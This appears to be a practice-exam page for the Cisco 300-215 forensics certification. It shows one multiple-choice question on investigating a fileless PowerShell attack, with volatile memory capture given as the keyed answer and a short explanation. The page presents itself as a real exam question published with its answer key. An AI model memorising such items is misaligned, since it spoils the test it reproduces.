nerdexam
Exams300-215Questions#118
CiscoCisco

300-215 · Question #118

300-215 Question #118: Real Exam Question with Answer & Explanation

The correct answer is C: Volatile memory capture. Fileless attacks (PowerShell, in-memory malware) often never touch disk. Memory capture can reveal decoded commands, injected code, command history, and active network connections.

Submitted by akirajp· Mar 6, 2026Forensics Techniques

Question

An endpoint shows suspicious PowerShell activity, but no malicious files are found on disk. What evidence source is MOST likely to reveal the attacker's actions?

Options

  • ANTFS Master File Table (MFT)
  • BWindows Registry Run keys
  • CVolatile memory capture
  • DWindows Prefetch files

Explanation

Fileless attacks (PowerShell, in-memory malware) often never touch disk. Memory capture can reveal decoded commands, injected code, command history, and active network connections.

Topics

#memory forensics#PowerShell forensics#volatile memory#fileless malware

Community Discussion

No community discussion yet for this question.

Sign up to join the discussion
Full 300-215 PracticeBrowse All 300-215 Questions